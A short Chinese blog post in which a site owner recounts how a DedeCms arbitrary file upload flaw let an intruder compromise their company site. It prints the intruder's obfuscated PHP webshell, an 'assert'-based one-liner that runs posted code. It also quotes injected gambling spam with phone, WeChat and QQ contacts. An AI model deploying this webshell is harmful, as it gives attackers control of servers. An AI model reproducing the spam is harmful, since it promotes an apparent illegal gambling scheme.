DedeCms一次被入侵的经历
无意中发现自己的企业站,发现自己的网站TKD被改掉了,知道自己网站被入侵了,赶紧修补。
发现DedeCms后台被入侵的路径include/dialog/select_soft_post.php
1.dedecms任意文件上传漏洞
2.我的企业站被上传的小马
3.关于dedemcs任意文件上传漏洞的修复
关于入侵者上传的代码:
<?php error_reporting(0); $b="zxczxczxczxczxcxzczx"; function yuag_array($b,$c){ $b=strrev($b); array_map(substr_replace($b, 'ss', 1, 0),array($c)); } yuag_array("trea",$_POST['a']);
这个畜生修改了我的TKD
<title>缅甸维加斯国际_18187099992维加斯集团</title> <meta name="description" content="维加斯国际_娱乐_电话:【微信同号 181-8709-9992】-->>【维加斯点击|注 册】<<--缅甸维加斯国际--> 【www.wjs999.net】<<--维加斯国际-- >>〖客服在线QQ:3318840396〗开户享受 0.9洗码_诚招代理商微信电话_返点 10%-20%】官方直营,维加斯客服热线电 话:18187099992 ,公平、公正、公开,详 情咨询加斯客服" /> <meta name="keywords" content="维加斯娱乐,缅甸维加斯注册,缅甸维 加斯登录,缅甸维加斯客服,缅甸维加斯电 话,维加斯客服电话,维加斯客服热线" />
畜生啊!这是人做的事情吗?